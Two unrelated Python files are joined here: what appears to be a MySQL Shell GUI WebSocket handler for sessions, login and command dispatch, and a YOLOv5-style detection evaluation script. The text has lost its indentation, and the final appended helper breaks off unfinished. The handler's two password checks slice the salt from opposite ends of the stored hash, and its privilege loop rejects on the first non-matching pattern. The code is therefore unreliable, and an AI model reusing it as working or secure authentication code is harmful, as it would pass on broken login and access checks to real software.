from gui_plugin.core.RequestHandler import RequestHandler
from gui_plugin.core.BackendDbLogger import BackendDbLogger
class ShellGuiWebSocketHandler(HTTPWebSocketsHandler):
def _is_shell_object(self, object):
return type(object).__name__ in ['Dict', 'List']
def setup(self):
super(ShellGuiWebSocketHandler, self).setup()
self._db = None
self._session_user_id = None
self._session_user_personal_group_id = None
self._active_profile_id = None
self._module_sessions = {}
self._requests = {}
self._requests_mutex = threading.Lock()
self.key = None
self.packets = {}
# Registry of handlers for prompt requests sent to the FE
self._prompt_handlers = {}
# A thread will be processing all the responses
self._response_queue = Queue()
self._response_thread = threading.Thread(target=self.process_responses)
def process_responses(self):
while self.connected:
try:
json_message = self._response_queue.get(timeout=1)
except Empty as e:
continue
self.send_message(json.dumps(json_message, default=str))
def process_message(self, json_message):
if 'request' in json_message:
request = json_message.get('request')
if request == 'authenticate':
if not self.is_authenticated:
self.authenticate_session(json_message)
else:
self.send_response_message('ERROR',
'This session was already '
'authenticated.',
json_message.get('request_id'))
elif not self.is_authenticated:
self.send_response_message('ERROR',
'This session is not yet '
'authenticated.',
json_message.get('request_id'))
elif request == 'execute':
self.execute_command_request(json_message)
elif request == 'cancel':
self.cancel_request(json_message)
elif request == 'prompt_reply':
self.prompt_reply(json_message)
else:
self.send_response_message('ERROR',
f'Unknown request: {request}.',
json_message.get('request_id'))
def on_ws_message(self, frame: WebSocket.Frame):
if frame.is_initial_fragment:
self.packets[self.session_uuid] = WebSocket.Packet()
self.packets[self.session_uuid].append(frame)
if self.packets[self.session_uuid].done():
message = self.packets[self.session_uuid].message
del self.packets[self.session_uuid]
logger.debug3(f"<- {message}")
try:
json_message = None
try:
json_message = json.loads(message)
except Exception as e:
raise Exception("Unable to decode the JSON message.")
if 'request' not in json_message:
raise Exception(
"The message is missing the 'request' attribute.")
if 'request_id' not in json_message:
raise Exception(
"The message is missing the 'request_id' attribute.")
request_id = json_message["request_id"]
# log message, if logging does not work, do not process
# the message due to security concerns
if not BackendDbLogger.message(self.session_id, json.dumps(message), is_response=False,
request_id=request_id):
raise Exception("Unable to process the request.")
self.process_message(json_message)
except Exception as e:
# Add the request id to the response if we have it available
args = {}
if json_message and 'request_id' in json_message:
args['request_id'] = json_message["request_id"]
# log the original message
BackendDbLogger.message(self.session_id,
json.dumps(message), is_response=False)
self.send_json_response(Response.exception(e, args))
def on_ws_connected(self):
logger.info("Websocket connected")
reset_session = False
if 'SessionId' in self.cookies.keys():
requested_session_id = self.cookies['SessionId']
self.session_uuid = str(requested_session_id)
try:
with self.db_tx() as db:
row = db.execute(
"""SELECT * FROM session
WHERE uuid=? AND source_ip=?
ORDER BY id DESC
LIMIT 1""", (requested_session_id, self.client_address[0])).fetch_one()
if row is not None:
if row['ended'] is not None:
# recover the session by using a continued session
db.execute(
'INSERT INTO session(uuid, continued_session_id, user_id, started, source_ip) VALUES(?, ?, ?, ?, ?)',
(requested_session_id, row['continued_session_id'] + 1, row['user_id'], datetime.datetime.now(), self.client_address[0]))
# In transaction context so the right id is returned
self.session_id = db.get_last_row_id()
row = db.execute(
"SELECT * FROM session WHERE id=?", (self.session_id, )).fetch_one()
if row['user_id'] and row['uuid']:
self.session_uuid = requested_session_id
self.session_id = row['uuid']
self._session_user_id = row['user_id']
self._session_user_personal_group_id = get_id_personal_user_group(
db, self._session_user_id)
default_profile = user_handler.get_default_profile(
db, self._session_user_id)
self.set_active_profile_id(
default_profile["id"])
threading.current_thread(
).name = f'wss-{self.session_uuid}'
# TODO(anyone): Why querying the "active profile" if it has been just set to the default profile?
active_profile = user_handler.get_profile(
db, self.session_active_profile_id)
self.send_response_message('OK', 'Session recovered', values={
"session_uuid": self.session_uuid,
"local_user_mode": self.is_local_session,
"active_profile": active_profile})
# Starts the response processor...
self._response_thread.start()
return
# If reaches this point it means the session id on the cookie was not valid at the end
# so we make sure a new session is created with the right UUID
reset_session = True
except Exception as e:
# No problem, we continue to create the new session
pass
# define a session uuid
if reset_session:
self.db.close()
self._db = None
self.session_uuid = str(uuid.uuid1())
# set the name of the current thread to the session_uuid
threading.current_thread().name = f'wss-{self.session_uuid}'
# insert this new session into the session table
try:
logger.info("Registering session...")
with self.db_tx() as db:
db.execute(
'INSERT INTO session(uuid, continued_session_id, started, source_ip) VALUES(?, ?, ?, ?)',
(self.session_uuid, 0, datetime.datetime.now(), self.client_address[0]))
self.session_id = db.get_last_row_id()
except Exception as e: # pragma: no cover
logger.error(f'Session could not be inserted into db. {e}')
self.send_json_response(Response.exception(e))
self._ws_close()
return
# send the session uuid back to the browser
logger.info("Sending response...")
self.send_response_message('OK', 'A new session has been created',
values={"session_uuid": self.session_uuid,
"local_user_mode": self.is_local_session})
# Starts the response processor...
self._response_thread.start()
def on_ws_closed(self):
# if the database connection for this thread was opened, close it
if self._db:
if self.session_uuid:
self.db.execute("UPDATE session SET ended=? WHERE uuid=?",
(datetime.datetime.now(), self.session_uuid))
self._db.close()
# close module sessions. use a copy so that we don't change the dict during the for
for module_session in dict(self._module_sessions).values():
module_session.close()
if self._response_thread.is_alive():
self._response_thread.join()
logger.info("Websocket closed")
def on_ws_sending_message(self, message):
json_message = json.loads(message)
if BackendDbLogger.message(self.session_id, message, is_response=True,
request_id=json_message.get('request_id', None)):
return message
logger.error("Failed to log message in the database.")
return json.dumps(Response.error(
"Response cancelled by the application.", {
"request_id": json_message["request_id"]
}))
def check_credentials(self, auth_header):
if self.cached_successful_auth == auth_header:
return True
# decode provided credentials
credentials = base64.b64decode(
auth_header[6:].encode("utf8")).decode("utf-8").split(':')
username = credentials[0]
password = credentials[1]
# since this function is called from outside a websocket session
# use separate GuiBackendDb() instance that needs to be closed
db = GuiBackendDb()
success = False
try:
res = db.execute('''SELECT id, password_hash
FROM user
WHERE name = ?''',
(username, )).fetch_one()
if res:
salt = res['password_hash'][:64]
password_hash = hashlib.pbkdf2_hmac(
'sha256', password.encode(), salt.encode(), 100000).hex()
if res['password_hash'][64:] == password_hash:
success = True
self.cached_successful_auth = auth_header
except Exception as e:
error_msg = f'User could not be authenticated. {str(e)}.'
logger.error(error_msg)
finally:
db.close()
return success
def send_json_response(self, json_message):
# Special handling required for shell objects
if self._is_shell_object(json_message):
json_message = json.loads(str(json_message).replace("\n", "\\n"))
self._response_queue.put(json_message)
def send_response_message(self, msg_type, msg, request_id=None,
values=None, api=False):
# get message text which is either a Dict that is converted to JSON or
# a str
msg_text = json.dumps(msg) if isinstance(msg, dict) else msg
# if a request_id is given, add it to the message
id_arg = {"request_id": request_id} if request_id else {}
values_arg = {}
        if values is not None:
# Special handling required for shell objects
if self._is_shell_object(values):
values = json.loads(str(values).replace("\n", "\\n"))
if api:
values_arg = {"result": values}
else:
# TODO(rennox): We should normalize the returning of responses
# there is no reason to have different flavors based on the
# type of values being returned
values_arg = values if isinstance(values, dict) else {
"result": values}
full_response = Response.standard(
msg_type, msg_text, {**id_arg, **values_arg})
# send the response message
self.send_json_response(full_response)
if msg_type in ["OK", "ERROR", "CANCELLED"]:
self.unregister_module_request(request_id)
def send_command_response(self, request_id, values):
# TODO(rennox): This function has to do weird magic because it
# is called to send the response from different commands, the
# PROBLEM is that the commands should NEVER be creating the
# response themselves, they should be implemented as simple APIs
# and their either succeed and return whatever value they return... or
# they should throw exceptions
if isinstance(values, dict) and 'request_state' in values:
values["request_id"] = request_id
# send the response message
self.send_json_response(values)
self.unregister_module_request(request_id)
else:
self.send_response_message(
"OK", "", request_id=request_id, values=values, api=True)
@property
def is_authenticated(self):
return self.session_user_id is not None
@property
def session_user_id(self):
return self._session_user_id
@property
def session_active_profile_id(self):
return self._active_profile_id
def set_active_profile_id(self, profile_id):
self._active_profile_id = profile_id
@property
def db(self):
# if the db object has not yet been initialized for this thread
if not self._db:
# open the database connection for this thread
self._db = GuiBackendDb(
log_rotation=True, web_session=WebSession(self))
return self._db
@contextmanager
def db_tx(self):
close = False
if threading.current_thread().getName() == self.session_uuid:
db = self.db
# if not, initialize a new database connection since SQLite objects
# can only be used in the thread they were created in
else:
close = True
db = GuiBackendDb()
try:
db.start_transaction()
yield db
db.commit()
except Exception:
db.rollback()
raise
finally:
if close:
db.close()
def get_module_session_object(self, module_session_id) -> ModuleSession:
# Check if there is a module_session with the given
# module_session_id in the module_session cache
module_session = self._module_sessions.get(module_session_id)
if not module_session:
raise Exception(f'There is no module_session in the cache that has '
f'the module_session_id '
f'{module_session_id} assigned.')
return module_session
def authenticate_session(self, json_msg):
request_id = json_msg.get('request_id')
username = json_msg.get('username')
try:
if self.is_local_session:
if username != gui.users.backend.LOCAL_USERNAME:
raise Exception('Incorrect username or password')
gui.users.backend.create_local_user(self.db)
row = self.db.execute(
'SELECT id, password_hash FROM user '
'WHERE upper(name) = upper(?)',
(username,)).fetch_one()
if row:
password_hash = None
if not self.is_local_session:
salt = row['password_hash'][64:]
password_hash = hashlib.pbkdf2_hmac(
'sha256', json_msg['password'].encode(), salt.encode(), 100000).hex()
if self.is_local_session or row[1] == password_hash + salt:
with self.db_tx() as db:
db.execute('UPDATE session SET user_id=? WHERE uuid=?',
(row['id'], self.session_uuid))
self._session_user_id = row[0]
self._session_user_personal_group_id = get_id_personal_user_group(
db, self._session_user_id)
# get default profile for the user
default_profile = gui.users.get_default_profile(
row[0], WebSession(self))
if default_profile["request_state"]["type"] != "OK":
msg = default_profile["request_state"]["msg"]
raise Exception(f'Could not get the default profile for'
f' the user. {msg}')
self.set_active_profile_id(
default_profile["result"]["id"])
values = {"active_profile": default_profile["result"]}
self.send_response_message('OK',
f'User {username} was '
f'successfully authenticated.',
request_id, values)
# TODO
# Update web_session with self.session_user_id
# TODO
# Cache the user's privileges
else:
# raise Exception(f'The given password for user '
# f'{json_msg.get("username")} is incorrect.')
raise Exception('Incorrect username or password')
else:
# raise Exception(f'There is no user account with the name '
# f'{json_msg.get("username")}.')
raise Exception('Incorrect username or password')
except Exception as e:
error_msg = f'User could not be authenticated. {str(e)}.'
logger.exception(error_msg)
self.send_response_message('ERROR', error_msg, request_id)
def execute_command_request(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
cmd = json_msg.get('command')
if not cmd:
raise Exception(
'No command given. Please provide the command.')
# Check if user is allowed to execute this command
allowed = False
res = self.db.execute(
'''SELECT p.name, p.access_pattern
FROM privilege p
INNER JOIN role_has_privilege r_p
ON p.id = r_p.privilege_id
INNER JOIN user_has_role u_r
ON r_p.role_id = u_r.role_id
WHERE u_r.user_id = ? AND p.privilege_type_id = 1''',
(self.session_user_id,)).fetch_all()
for row in res:
p = re.compile(row[1])
m = p.match(cmd)
if not m:
raise Exception(f'This user account has no privileges to '
f'execute the command {cmd}')
allowed = True
break
if not allowed:
raise Exception(f'This user does not have the necessary '
f'privileges to execute the command {cmd}.')
# Argument need to be passed in a dict using the argument names as
# the keys
args = json_msg.get('args', {})
kwargs = json_msg.get('kwargs', {})
kwargs = { **args, **kwargs }
v = kwargs.get('value')
if v and type(v) == dict:
# TODO: Check why a dict cannot be passed as it makes the
# shell error out
kwargs.update({"value": json.dumps(v)})
# Inspect the function arguments and check if there are arguments
# named user_id, profile_id, web_session, request_id,
# module_session, async_web_session or session.
# If so, replace them with session variables
f_args = []
# Loop over all chained objects/functions of the given cmd and find
# the function to call
matches = re.findall(r'(\w+)\.', cmd + '.')
mod = None
mod_name = None
parent_obj = None
parent_obj_name = None
func = None
if len(matches) < 2:
raise Exception(
f"The command '{cmd}' is using wrong format. "
"Use <global>[.<object>]*.<function>")
# Last entry is a function name
function_name = matches[-1]
# Rest is a chain of objects
objects = matches[:-1]
found_objects = []
# Selects the parent object
if objects[0] == 'gui':
parent_obj = gui
objects = objects[1:]
found_objects.append('gui')
else:
parent_obj = mysqlsh.globals
# Searches the object hierarchy
for object in objects:
try:
child = getattr(parent_obj, object)
# Set the parent_obj for the next object evaluation
parent_obj = child
found_objects.append(object)
except:
if len(found_objects) == 0:
raise Exception(
f"The '{object}' global object does not exist")
else:
raise Exception(
f"Object '{'.'.join(found_objects)}' has no member named '{object}'")
# Searches the target function
try:
func = getattr(parent_obj, function_name)
except:
raise Exception(
f"Object '{'.'.join(found_objects)}' has no member function named '{function_name}'")
f_args = {}
if func:
f_args = self.get_function_arguments(
func=func, mod=parent_obj, mod_cmd=function_name)
if "user_id" in f_args:
# Return error if user_id does not match self.session_user_id
if self.session_user_id is None or "user_id" not in kwargs \
or kwargs["user_id"] != self.session_user_id:
raise Exception(f'The function argument user_id must not '
f'be set to a different user_id than the '
f'one used in the '
f'authenticated session.')
kwargs.update({"user_id": self.session_user_id})
if "profile_id" in f_args:
if "profile_id" not in kwargs:
kwargs.update({"profile_id":
self.session_active_profile_id})
if "web_session" in f_args:
kwargs.update({"web_session": WebSession(self)})
if "request_id" in f_args:
kwargs.update({"request_id": request_id})
if "interactive" in f_args:
kwargs.update({"interactive": False})
if "session" in f_args:
from gui_plugin.core.modules.DbModuleSession import DbModuleSession
from gui_plugin.core.dbms.DbMySQLSession import DbMysqlSession
# If the called function requires a session parameter,
# get it from the given module_session
if not 'module_session_id' in kwargs:
raise Exception(
f'The function {cmd} requires the module_session_id '
'argument to be set.')
module_session = self.get_module_session_object(
kwargs['module_session_id'])
if not isinstance(module_session, DbModuleSession):
raise Exception(
f'The function {cmd} needs a module_session_id '
'argument set to a DbModuleSession.')
db_module_session = module_session._db_service_session
if not isinstance(db_module_session, DbMysqlSession):
raise Exception(
f'The function {cmd} needs a module_session_id '
'argument set to a DbModuleSession using MySQL.')
kwargs.update({"session": db_module_session.session})
del kwargs['module_session_id']
module_session = None
if "module_session" in f_args:
if "module_session_id" not in kwargs:
raise Exception('No module_session_id given. Please '
'provide the module_session_id.')
# swap 'module_session_id' with 'module_session'
module_session = self.get_module_session_object(
kwargs['module_session_id'])
kwargs.update({"module_session": module_session})
del kwargs['module_session_id']
# if the function has an async_web_session argument it needs to be
# run in a separate thread and communication with the web_session
# thread needs to be synchronized
if "async_web_session" in f_args:
kwargs.update({"async_web_session": WebSession(self)})
res = {"request_state":
{'type': 'PENDING',
'msg': 'Async execution has been started'}}
# execute command in its own thread
thread = threading.Thread(target=func, kwargs=kwargs)
thread.name = f'req-{request_id}'
thread.start()
elif found_objects[0] != 'gui':
thread = RequestHandler(request_id, func, kwargs, self)
thread.start()
result = None
else:
result = func(**kwargs)
except Exception as e:
logger.exception(e)
result = Response.exception(e)
if result is not None:
self.send_command_response(request_id, result)
def get_function_arguments(self, func, mod, mod_cmd):
try:
# try to use the regular inspection function to get the function
# arguments
sig = inspect.signature(func)
f_args = [p.name for p in sig.parameters.values()]
except: # pragma: no cover
# if that fails, fall back to parsing the help output of that
# function
help_func = getattr(mod, 'help')
help_output = help_func(f'{mod_cmd}')
match = re.match(r'(.|\s)*?SYNTAX(.|\s)*?\(([\w,\[\]\s]*)',
help_output, flags=re.MULTILINE)
arguments = match[3].replace('[', '').replace(']', '').\
replace('\n', '').replace(' ', '')
f_args = arguments.split(",")
# Include the kwargs
if 'kwargs' in f_args:
f_args.remove('kwargs')
desc_idx = help_output.find(
'The kwargs parameter accepts the following options:')
desc = help_output[desc_idx + 53:]
matches = re.findall(r'-\s(\w*)\:', desc, flags=re.MULTILINE)
for match in matches:
f_args.append(match)
return f_args
def register_module_session(self, module_session):
self._module_sessions[module_session.module_session_id] = module_session
def unregister_module_session(self, module_session):
if module_session.module_session_id in self._module_sessions:
# If we close module we need also clean up requests registry for that module
with self._requests_mutex:
self._requests = {k: v for k, v in self._requests.items(
) if v != module_session.module_session_id}
del self._module_sessions[module_session.module_session_id]
def register_module_request(self, request_id, module_session_id):
with self._requests_mutex:
self._requests[request_id] = module_session_id
def unregister_module_request(self, request_id):
with self._requests_mutex:
if request_id in self._requests:
del self._requests[request_id]
def cancel_request(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
module_session = self.get_module_session_object(
self._requests[request_id])
if not hasattr(module_session, 'cancel_request'):
raise Exception(
f"Module {type(module_session)} doesn't support cancel_request.")
module_session.cancel_request(request_id)
self.send_response_message('OK', 'Request cancelled.', request_id)
except Exception as e:
logger.error(e)
self.send_response_message('ERROR', str(e).strip(), request_id)
def send_prompt_response(self, request_id, prompt, handler):
self._prompt_handlers[request_id] = handler
self.send_response_message("PENDING",
'Executing...',
request_id,
prompt,
api=True)
def prompt_reply(self, json_msg):
request_id = json_msg.get('request_id')
try:
if not request_id:
raise Exception('No request_id given. '
'Please provide the request_id.')
prompt_handler = self._prompt_handlers.pop(request_id)
prompt_handler.process_prompt_reply(json_msg)
except KeyError as e:
logger.error(e)
self.send_response_message(
'ERROR', f'Unexpected prompt for request_id=\'{request_id}\'')
except Exception as e:
logger.error(e)
self.send_response_message('ERROR', str(e).strip(), request_id)
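# Illustrative sketch (not part of the original handler): the salted PBKDF2
# comparison performed in check_credentials() above, as a standalone function.
# It assumes the stored value is '<64-hex-char salt><pbkdf2-sha256 hex digest>',
# matching the slicing used in check_credentials(); the actual storage layout
# is defined by the backend code that writes the user table.
def _verify_pbkdf2_password(stored_hash, password):
    salt = stored_hash[:64]
    digest = hashlib.pbkdf2_hmac(
        'sha256', password.encode(), salt.encode(), 100000).hex()
    return stored_hash[64:] == digest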
class WebSession():
    def __init__(self, shell_gui_web_socket_handler):
        self._socket_handler = shell_gui_web_socket_handler
self._db = None
@property
def db(self):
# if the db object has not yet been initialized for this websession
if not self._db:
# open the database connection for this thread
self._db = self._socket_handler.db
return self._db
@property
def user_id(self):
return self._socket_handler._session_user_id
@property
def user_personal_group_id(self):
return self._socket_handler._session_user_personal_group_id
@property
def session_uuid(self):
return self._socket_handler.session_uuid
@property
def is_local_session(self):
return self._socket_handler.is_local_session
def send_response_message(self, msg_type, msg, request_id=None,
values=None, api=False):
if self._socket_handler:
self._socket_handler.send_response_message(msg_type, msg,
request_id=request_id,
values=values,
api=api)
def send_command_response(self, request_id, values):
if self._socket_handler:
self._socket_handler.send_command_response(request_id, values)
def register_module_session(self, module_session):
if self._socket_handler:
self._socket_handler.register_module_session(module_session)
def unregister_module_session(self, module_session):
if self._socket_handler:
self._socket_handler.unregister_module_session(module_session)
def get_module_session_object(self, module_session_id):
if self._socket_handler:
return self._socket_handler.get_module_session_object(module_session_id)
def set_active_profile_id(self, profile_id):
if self._socket_handler:
self._socket_handler.set_active_profile_id(profile_id)
@property
def session_active_profile_id(self):
if self._socket_handler:
return self._socket_handler.session_active_profile_id
def register_module_request(self, request_id, module_session_id):
if self._socket_handler:
self._socket_handler.register_module_request(
request_id, module_session_id)
def unregister_module_request(self, request_id):
if self._socket_handler:
self._socket_handler.unregister_module_request(request_id)
def send_prompt_response(self, request_id, prompt, handler):
if self._socket_handler:
self._socket_handler.send_prompt_response(
request_id, prompt, handler)
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
wandb_logger=None,
compute_loss=None,
half_precision=True,
is_coco=False,
opt=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' and half_precision # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
if isinstance(data, str):
is_coco = data.endswith('coco.yaml')
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs = 0
if wandb_logger and wandb_logger.wandb:
log_imgs = min(wandb_logger.log_imgs, 100)
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = opt.task if opt.task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging - Media Panel Plots
if len(wandb_images) < log_imgs and wandb_logger.current_epoch > 0: # Check for test operation
if wandb_logger.current_epoch % wandb_logger.bbox_interval == 0:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb_logger.wandb.Image(img[si], boxes=boxes, caption=path.name))
wandb_logger.log_training_progress(predn, path, names) if wandb_logger and wandb_logger.wandb_run else None
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(predn, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12i' * 2 + '%12.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb_logger and wandb_logger.wandb:
val_batches = [wandb_logger.wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]
wandb_logger.log({"Validation": val_batches})
if wandb_images:
wandb_logger.log({"Bounding Box Debugger/Images": wandb_images})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
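# Illustrative sketch (not part of the original script): the pairwise IoU
# computation that drives the `correct` matrix above. box_iou from
# utils.general implements the same idea; this standalone version needs only
# torch and shows how an (N, M) IoU matrix is built from N predicted and M
# target boxes in xyxy format.
def pairwise_iou_xyxy(boxes1, boxes2):
    area1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1])
    area2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1])
    lt = torch.max(boxes1[:, None, :2], boxes2[None, :, :2])  # intersection top-left
    rb = torch.min(boxes1[:, None, 2:], boxes2[None, :, 2:])  # intersection bottom-right
    wh = (rb - lt).clamp(min=0)                                # zero where boxes do not overlap
    inter = wh[..., 0] * wh[..., 1]                            # (N, M) intersection areas
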